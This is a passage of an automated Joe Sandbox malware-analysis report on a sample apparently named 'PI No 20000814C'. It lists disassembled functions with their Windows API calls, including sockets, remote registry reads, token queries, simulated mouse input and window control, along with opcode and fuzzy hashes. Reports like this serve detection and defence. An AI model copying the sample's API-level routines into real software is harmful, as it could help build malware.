                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                    • String ID: RoUninitialize$combase.dll
                                    • API String ID: 3489934621-2819208100
                                    • Opcode ID: 3e5a09c199db358431e53ae33c0a70125fa96f747d02c91c94ed8dfb62fc10bd
                                    • Instruction ID: c0fc64b496e4a1deadbe90b93bc5e0005ce8a3678e0a400aec25cb06d3603f55
                                    • Opcode Fuzzy Hash: 3e5a09c199db358431e53ae33c0a70125fa96f747d02c91c94ed8dfb62fc10bd
                                    • Instruction Fuzzy Hash: FDE0B678A91318EFEB519B62FE1EF953AA4B724B42F144029F041E20A0CBB4A548FB15
                                    Function 00F76E17 Relevance: 9.2, APIs: 6, Instructions: 250networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • __WSAFDIsSet.WS2_32(00000000,?), ref: 00F76F14
                                    • WSAGetLastError.WS2_32(00000000), ref: 00F76F48
                                    • htons.WS2_32(?), ref: 00F76FFE
                                    • inet_ntoa.WS2_32(?), ref: 00F76FBB
                                      • Part of subcall function 00F5AE14: _strlen.LIBCMT ref: 00F5AE1E
                                      • Part of subcall function 00F5AE14: _memmove.LIBCMT ref: 00F5AE40
                                    • _strlen.LIBCMT ref: 00F77058
                                    • _memmove.LIBCMT ref: 00F770C1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                    • String ID:
                                    • API String ID: 3619996494-0
                                    • Opcode ID: 1e67ea3a2c6e18c1950a52d7088a32f31b750077fdeafd9afa2e47c6de876f58
                                    • Instruction ID: 3d266ee49446db51db2548d778aa570c3ed05824cf0a01a2e037cc66561bd9c7
                                    • Opcode Fuzzy Hash: 1e67ea3a2c6e18c1950a52d7088a32f31b750077fdeafd9afa2e47c6de876f58
                                    • Instruction Fuzzy Hash: 4F81D271508300AFD710EB24CC85F6BB7E9AF84724F10851DF5599B2E2DB74AD05EB52
                                    Function 00F6675A Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: _memmove$__itow__swprintf
                                    • String ID:
                                    • API String ID: 3253778849-0
                                    • Opcode ID: 08925d99e4a2ba070978e6d27493ca70a0b04bf08e83e741c3cfa716157a97dd
                                    • Instruction ID: 64459a0b6223721370a3d3f8cc8e7543644a9847bbf38e481539b276cb9eca39
                                    • Opcode Fuzzy Hash: 08925d99e4a2ba070978e6d27493ca70a0b04bf08e83e741c3cfa716157a97dd
                                    • Instruction Fuzzy Hash: 8E61AC3190429A9BCF11EF64CC81EFE77A4AF44318F044559FC55AB1D2EB78A905FB90
                                    Function 00F8046F Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F07F41: _memmove.LIBCMT ref: 00F07F82
                                      • Part of subcall function 00F810A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F80038,?,?), ref: 00F810BC
                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F80548
                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F80588
                                    • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00F805AB
                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00F805D4
                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00F80617
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00F80624
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                    • String ID:
                                    • API String ID: 4046560759-0
                                    • Opcode ID: b93664b093fe8873bb8cfed6a538a78113941bf7dbf1c5803280485ddf116adf
                                    • Instruction ID: 7d4e3e3d334547380324239ecc0b9f062da6e62588396836981ac78ae240196f
                                    • Opcode Fuzzy Hash: b93664b093fe8873bb8cfed6a538a78113941bf7dbf1c5803280485ddf116adf
                                    • Instruction Fuzzy Hash: 8D516A31608300AFCB14EB14CC85EABBBE8FF88714F44491DF5558B1A1DB75E909EB52
                                    Function 00F85A20 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetMenu.USER32(?), ref: 00F85A82
                                    • GetMenuItemCount.USER32(00000000), ref: 00F85AB9
                                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00F85AE1
                                    • GetMenuItemID.USER32(?,?), ref: 00F85B50
                                    • GetSubMenu.USER32(?,?), ref: 00F85B5E
                                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 00F85BAF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Menu$Item$CountMessagePostString
                                    • String ID:
                                    • API String ID: 650687236-0
                                    • Opcode ID: 56f965be162775fc1b0b99145f041880e7d234da1e59130d6391338e96671e24
                                    • Instruction ID: 9fb01f3a7e0c530be96a810890b67b96c68d3410f35827443fa93b2a8de79ed9
                                    • Opcode Fuzzy Hash: 56f965be162775fc1b0b99145f041880e7d234da1e59130d6391338e96671e24
                                    • Instruction Fuzzy Hash: 96517231E00615EFCF15EFA4C845AEEB7B5EF58720F104459E811BB351DB78AE41AB90
                                    Function 00F5F3DD Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                    Download Yara Rule
                                    APIs
                                    • VariantInit.OLEAUT32(?), ref: 00F5F3F7
                                    • VariantClear.OLEAUT32(00000013), ref: 00F5F469
                                    • VariantClear.OLEAUT32(00000000), ref: 00F5F4C4
                                    • _memmove.LIBCMT ref: 00F5F4EE
                                    • VariantClear.OLEAUT32(?), ref: 00F5F53B
                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00F5F569
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Variant$Clear$ChangeInitType_memmove
                                    • String ID:
                                    • API String ID: 1101466143-0
                                    • Opcode ID: 4ff2360ff30e52ed33a5a3814703d7465f5a02945ef2342295053052ae22be2a
                                    • Instruction ID: af8080e6f470eb08c88f63d1603339ef827333d14cfbc59265a465c60a8c8ede
                                    • Opcode Fuzzy Hash: 4ff2360ff30e52ed33a5a3814703d7465f5a02945ef2342295053052ae22be2a
                                    • Instruction Fuzzy Hash: EF516CB5A00209DFCB10CF58D884AAAB7B8FF4C354F15856AEE59DB340E730E915CBA0
                                    Function 00F626F9 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 00F62747
                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F62792
                                    • IsMenu.USER32(00000000), ref: 00F627B2
                                    • CreatePopupMenu.USER32 ref: 00F627E6
                                    • GetMenuItemCount.USER32(000000FF), ref: 00F62844
                                    • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00F62875
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                    • String ID:
                                    • API String ID: 3311875123-0
                                    • Opcode ID: ef3f1847cbff8d5711b2c4763c3337f522cc6445003feaecb978de3dafbb727e
                                    • Instruction ID: 3e329c9028064d36f4abf31c93b07012a74be927d9858d759f10b5b2eb572912
                                    • Opcode Fuzzy Hash: ef3f1847cbff8d5711b2c4763c3337f522cc6445003feaecb978de3dafbb727e
                                    • Instruction Fuzzy Hash: 5D518B70E00A0AEFDF64CF78DC88BAEBBF4AF44324F14416AE8119B291D7749944EB51
                                    Function 00F01765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F02612: GetWindowLongW.USER32(?,000000EB), ref: 00F02623
                                    • BeginPaint.USER32(?,?,?,?,?,?), ref: 00F0179A
                                    • GetWindowRect.USER32(?,?), ref: 00F017FE
                                    • ScreenToClient.USER32(?,?), ref: 00F0181B
                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00F0182C
                                    • EndPaint.USER32(?,?), ref: 00F01876
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                    • String ID:
                                    • API String ID: 1827037458-0
                                    • Opcode ID: 7515686518e9a0ed38b80b9ffdbc8a89e9fce5082f82f0a79d0d801d722928ea
                                    • Instruction ID: 9a8edd6063876aa43cd23154ee34ee0f0deb7ec1089fc6ed34e0740552e8a50e
                                    • Opcode Fuzzy Hash: 7515686518e9a0ed38b80b9ffdbc8a89e9fce5082f82f0a79d0d801d722928ea
                                    • Instruction Fuzzy Hash: B6416571604204AFDB10DF24CC89FBA7BE8BB49724F044628FAA4C62E1C7259949FB61
                                    Function 00F8B958 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • ShowWindow.USER32(00FC67B0,00000000,01983AE0,?,?,00FC67B0,?,00F8B862,?,?), ref: 00F8B9CC
                                    • EnableWindow.USER32(00000000,00000000), ref: 00F8B9F0
                                    • ShowWindow.USER32(00FC67B0,00000000,01983AE0,?,?,00FC67B0,?,00F8B862,?,?), ref: 00F8BA50
                                    • ShowWindow.USER32(00000000,00000004,?,00F8B862,?,?), ref: 00F8BA62
                                    • EnableWindow.USER32(00000000,00000001), ref: 00F8BA86
                                    • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00F8BAA9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Window$Show$Enable$MessageSend
                                    • String ID:
                                    • API String ID: 642888154-0
                                    • Opcode ID: f04233dea95c789fd4e3f50f0a5358a37a650c315f8dbd21131d6f325cc2b72e
                                    • Instruction ID: c106827eba44794683b83efe65708c232c8c54a81e2be0a737e9b8da525703b6
                                    • Opcode Fuzzy Hash: f04233dea95c789fd4e3f50f0a5358a37a650c315f8dbd21131d6f325cc2b72e
                                    • Instruction Fuzzy Hash: 0E416130A00245EFDB25DF14C489BE57BE0FF05321F1842B9EE588F2A2C735A849EB51
                                    Function 00F773B1 Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetForegroundWindow.USER32(?,?,?,?,?,?,00F75134,?,?,00000000,00000001), ref: 00F773BF
                                      • Part of subcall function 00F73C94: GetWindowRect.USER32(?,?), ref: 00F73CA7
                                    • GetDesktopWindow.USER32 ref: 00F773E9
                                    • GetWindowRect.USER32(00000000), ref: 00F773F0
                                    • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00F77422
                                      • Part of subcall function 00F654E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F6555E
                                    • GetCursorPos.USER32(?), ref: 00F7744E
                                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00F774AC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                    • String ID:
                                    • API String ID: 4137160315-0
                                    • Opcode ID: 740a1dda3f43289039f7c63cc1a933d8034a8de959e3d6871d1394814c151cec
                                    • Instruction ID: b8d01bde09956410e05fd87caf26f1128bfc38ef79929fd6fb6fb08e682bd2c1
                                    • Opcode Fuzzy Hash: 740a1dda3f43289039f7c63cc1a933d8034a8de959e3d6871d1394814c151cec
                                    • Instruction Fuzzy Hash: CB31A372508319AFD720DF54DC49EAABBE9FF88314F00491AF589A7191DB30E9189B92
                                    Function 00F5E0B5 Relevance: 9.1, APIs: 6, Instructions: 90memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F5E0FA
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F5E120
                                    • SysAllocString.OLEAUT32(00000000), ref: 00F5E123
                                    • SysAllocString.OLEAUT32 ref: 00F5E144
                                    • SysFreeString.OLEAUT32 ref: 00F5E14D
                                    • SysAllocString.OLEAUT32(?), ref: 00F5E175
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: String$Alloc$ByteCharMultiWide$Free
                                    • String ID:
                                    • API String ID: 1313759350-0
                                    • Opcode ID: add3ce10c170a80603ecc90db57af4e0acd89432a4c65367b121ca3ad4f0e743
                                    • Instruction ID: 9a36128d2611eedf5c1c424bee7b814981a755bde9474863e26c1e933bde7d76
                                    • Opcode Fuzzy Hash: add3ce10c170a80603ecc90db57af4e0acd89432a4c65367b121ca3ad4f0e743
                                    • Instruction Fuzzy Hash: 1E21A472600508AF9B14DFA8DC88DBB77ECEB09761B108125FE54CB2A1DA70DD45AB64
                                    Function 00F6ED8E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 323COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F09997: __itow.LIBCMT ref: 00F099C2
                                      • Part of subcall function 00F09997: __swprintf.LIBCMT ref: 00F09A0C
                                      • Part of subcall function 00F1FEC6: _wcscpy.LIBCMT ref: 00F1FEE9
                                    • _wcstok.LIBCMT ref: 00F6EEFF
                                    • _wcscpy.LIBCMT ref: 00F6EF8E
                                    • _memset.LIBCMT ref: 00F6EFC1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                    • String ID: X
                                    • API String ID: 774024439-3081909835
                                    • Opcode ID: 542898fc8345be87d85f4938cd71afbac4f5aa432db2e5ff577c39f179e91c4e
                                    • Instruction ID: a93476d15aac112f06cf49ddfef723912468b8ab7bcca0600f10e7b5ea527a73
                                    • Opcode Fuzzy Hash: 542898fc8345be87d85f4938cd71afbac4f5aa432db2e5ff577c39f179e91c4e
                                    • Instruction Fuzzy Hash: 4EC181759083009FC724EF24DC85A5AB7E4FF85310F04496DF899972A2DB74ED49EB82
                                    Function 00F58D5B Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F585F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00F58608
                                      • Part of subcall function 00F585F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00F58612
                                      • Part of subcall function 00F585F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00F58621
                                      • Part of subcall function 00F585F1: RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 00F58628
                                      • Part of subcall function 00F585F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00F5863E
                                    • GetLengthSid.ADVAPI32(?,00000000,00F58977), ref: 00F58DAC
                                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00F58DB8
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00F58DBF
                                    • CopySid.ADVAPI32(00000000,00000000,?), ref: 00F58DD8
                                    • GetProcessHeap.KERNEL32(00000000,00000000,00F58977), ref: 00F58DEC
                                    • HeapFree.KERNEL32(00000000), ref: 00F58DF3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Heap$Process$AllocateInformationToken$CopyErrorFreeLastLength
                                    • String ID:
                                    • API String ID: 169236558-0
                                    • Opcode ID: c457a061a61656ea9fa4ee47c4ce451436bd07e09fe067c339bbe41b27e42872
                                    • Instruction ID: f315d1961e233e1cdd76dbcfd01bfd5c35c15859c95a02dbcfbcc73a61619da8
                                    • Opcode Fuzzy Hash: c457a061a61656ea9fa4ee47c4ce451436bd07e09fe067c339bbe41b27e42872
                                    • Instruction Fuzzy Hash: 1211EE32900608FFDB109FA4CC09BFE7BB9EF553A6F104029ED45A3251DB329909EB60
                                    Function 00F8C19A Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F012F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00F0134D
                                      • Part of subcall function 00F012F3: SelectObject.GDI32(?,00000000), ref: 00F0135C
                                      • Part of subcall function 00F012F3: BeginPath.GDI32(?), ref: 00F01373
                                      • Part of subcall function 00F012F3: SelectObject.GDI32(?,00000000), ref: 00F0139C
                                    • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00F8C1C4
                                    • LineTo.GDI32(00000000,00000003,?), ref: 00F8C1D8
                                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00F8C1E6
                                    • LineTo.GDI32(00000000,00000000,?), ref: 00F8C1F6
                                    • EndPath.GDI32(00000000), ref: 00F8C206
                                    • StrokePath.GDI32(00000000), ref: 00F8C216
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
